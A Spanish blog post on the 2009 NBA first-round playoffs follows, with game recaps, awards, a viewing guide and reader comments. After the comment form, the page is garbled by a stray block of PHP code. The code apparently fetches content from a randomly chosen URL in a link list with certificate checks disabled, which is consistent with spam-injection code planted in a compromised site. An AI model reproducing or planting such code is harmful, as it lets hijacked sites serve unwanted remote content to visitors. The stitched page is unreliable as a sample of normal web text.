Playoff (26/04/2009): ¡Esto son los Playoffs!

27 de April de 2009 por TheDeerHunter

By TheDeerHunter & Txusma

Sensacional jornada marcada por la igualdad, la emoción y las actuaciones sublimes. Es curioso, el año pasado pensábamos que la primera ronda iba a ser la bomba y al final resultó bastante bluff. En cambio este año, con tanta lesión, no esperábamos grandes batallas y sin embargo las eliminatorias se han igualado y están resultando preciosas. No obstante supongo que todos cambiaríamos tal espectáculo por contar con algunas de las figuras que se han quedado fuera.

La primera de las eliminatorias está siendo la más bonita de todas. Uno de esos duelos que hacen que uno se enamore del baloncesto y entre dos franquicias míticas para más inri. Ayer a muchos les vendría a la cabeza el último partido en el que ambos se jugaron dos prórrogas en una eliminatoria. Aquel día un saltarín con el número 23 de los toros les cascó 63 a los todopoderosos Celtics de Bird, Parish y McHale. Han pasado precisamente 23 años desde aquel momento y anoche muchos rejuvenecimos dejándonos parte de nuestro maltrecho corazón en los triples de Allen, Gordon o Pierce.

Es difícil extraer las claves en un partido en el que hubo tanto y tan bueno. Dijimos el otro día que los Celtics habían logrado fijar su defensa exterior y que esto prácticamente decantaba la eliminatoria. Anoche Del Negro le dio una vuelta de tuerca a su juego colectivo e impuso un equilibrio que los Celtics no lograron contrarrestar, oxigenando así su línea exterior. Perkins, Davis, Moore sufrieron de lo lindo, hasta el punto que los campeones se vieron obligados a jugarse las castañas a partir de la eliminación de Perkins con Moore o Davis y 4 “bajitos”. Por ese lado se inclinó la balanza en los últimos minutos donde los Bulls no perdieron la iniciativa en ningún momento. Los campeones vuelven a Boston con 2-2 y mucho que sudar para librarse de un rival todavía más molesto de lo esperado.

El segundo partido que se libró al límite fue el Sixers-Magic con (esta vez sí) el enésimo triple de la victoria de Turkoglu (hay que ver lo originales que son estos tíos). No deja de sorprender que un equipo que apenas llega al 30% en triples se juegue las victorias por esa vía. El encuentro en sí no fue especialmente bonito. De hecho, “los Andres” en esta ocasión estuvieron bastante desacertados (10-31 entre ambos) y ajustando mínimamente el punto de mira de Turkoglu y Lewis los Magic recuperaron el factor cancha. Golpe moral a los Sixers, que globalmente han sido mucho mejor que Orlando y que, de repente, vuelven a ver otra vez la eliminatoria cuesta arriba.

Pero dicen que no hay dos sin tres. El Rockets-Blazers también se decidió en el último tiro. Alucinemos: Un esperpéntico triple preparado para Outlaw. Antes de eso la omnipresente jugada forzada para Roy, taponada por Battier (será por defensores exteriores en Houston) y todo con dos campeones del mundo comiéndose los mocos. Pero bien, el objetivo de McMillan era llegar a playoffs, así que no pasa nada si parece que se ha empeñado en tirar la eliminatoria por el váter. Un aplauso para McMillan que, con todo, su equipo le ha plantado cara a los Rockets. Eso sí, quedará para algunos la sensación de que los Blazers han tenido la eliminatoria en su propia mano. Recordemos que los triples decisivos se los han jugado Blake, Outlaw… grandísimos killers y mejores personas.

Por último, poco o nada que contar para el 4-0 que les han endosado los Cavs a los Pistons… después haremos un análisis algo más sesudo, pero el partido tampoco ha tenido historia. Veremos si empiezan ahora los playoffs para Lebron y los suyos.

PREMIOS

MVP: Siguiendo el guión previsto, Lebron James y los Cavs han arrasado literalmente a unos tristes Pistons. 36 puntos, 13 rebotes y 8 asistencias fueron los número de The King ayer y ojo a sus promedios en esta primera ronda: 32 puntos, 11.2 rebotes y 7.5 asistencias. ¡Brutal!

Rookie: Si Derrick Rose funciona, los Bulls funcionan. Anoche cuajó otro buen partido con 23 puntos, 11 rebotes y 9 rebotes, tan sólo ensombrecido por las 7 pérdidas que contabilizó.

Sorpresa: La de 2 resucitados que venían cuajando unos decepcionantes playoffs pero que han resultado decisivos para las victorías de sus equipos. Por un lado Hedo Turkoglu, con un triplazo sobre Thaddeus Young a falta de 1 segundo y por el otro John Salmons, autor de los últimos 4 puntos de los Bulls y del tapón a Paul Pierce que aseguraba la victoria.

Decepción: Se acabó el ciclo virtuoso de los Pistons de la peor manera posible, dando una muy mala imagen y siendo superados en todos los aspectos y en todo momento por los Cavs, un equipo con mucha más hambre de victoria. Tayshaun Prince (3.75 ptos, 3.5 rbts, 1.25 asistencias) y Rasheed Wallace (6.5 pts, 6.2 rtbts) son los dos jugadores que mejor personifican la debacle.

Esfuerzo en vano: Tras 2 prórrogas Rajon Rondo, Ray Allen y Paul Pierce tuvieron que ver como el partido caía del lado de los Bulls. Nuevo triple doble del primero (25-11-11), 28 puntos del segundo y 29 del tercero. Más no pudieron hacer.

RAZONES PARA TRASNOCHAR

– Atlanta @ Miami (2.00h):Posiblemente Dwyane Wade se hubiera bastado para ganar esta eliminatoría a los Hawks pero si además cuenta con la ayuda de Jermaine O’Neal y el resto de secundarios, las posibilidades de los de Atlanta se reducen a la mínima expresión. Deberían aplicarse mucho más en defensa si quieren tener una mínima oportunidad.

– Denver @ New Orleans (2.30h): Chris Paul debe seguir con ganas de reivindicarse y de demostrar al mundo y a sí mismo que es el mejor base de la NBA. Enfrente, un Chauncey Billups que año tras año nos sorprende agradablemente un poquito más.

– Utah @ Los Angeles (4.30h): Match point para los Lakers. Conociendo la determinación de Kobe Bryant y la debilidad de de la defensa de los Jazz me extrañaría mucho que se les escapara a los amarillos esta oportunidad de finiquitar la eliminatoria y descansar unos días más.

Comenta

5 comentarios a esta entrada

  1. El blog de la ÑBA dice:
    #1

    Dixit: “Recordemos que los triples decisivos se los han jugado Blake, Outlaw… grandísimos killers y mejores personas”.

    jajajajajjajajaj

    Lo has resumido en una frase a la perfección.

      Citar

  2. TheDeerHunter dice:
    #2

    ¿Soy yo o en la foto de cabecera Rose le está pegando en la cara a Escalabrine con todo lo gordo???
    qué imagen más acertada hemos escogido

      Citar

  3. Txusma dice:
    #3

    Supongo q de todo se aprendre y estos Blazers regresaran el año q viene con mas experiencia…

      Citar

  4. couxe dice:
    #4

    A pesar de la cabezonería de McMillan, no creo que se deba dar por muerto a Portland… Eso sí, lo tienen muy chungo, y cuanto más sigan a rajatabla el manual de Nate más fácil todavía se lo pondrán a Houston…

    Por cierto, grande como siempre Daimiel en la entrada de su blog de hoy:
    “…Todo el mundo se va a quedar con la decisión tomada por el equipo de Oregon a falta de ocho segundos, estando tres puntos abajo en el marcador: Balón a Outlaw y tiro rápido de éste. ¿McMillan jugando a efecto sorpresa? Nate es de los que todos los años le hacen el mismo regalo a su mujer por su cumpleaños. La gente que no tiene capacidad de sorprender no debe ni intentarlo, no están acostumbrados… ”

      Citar

  5. sabas dice:
    #5

    De todo se aprende pero hay entrenadores muy duros de mollera y parece que este es el caso, veremos que pasa

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>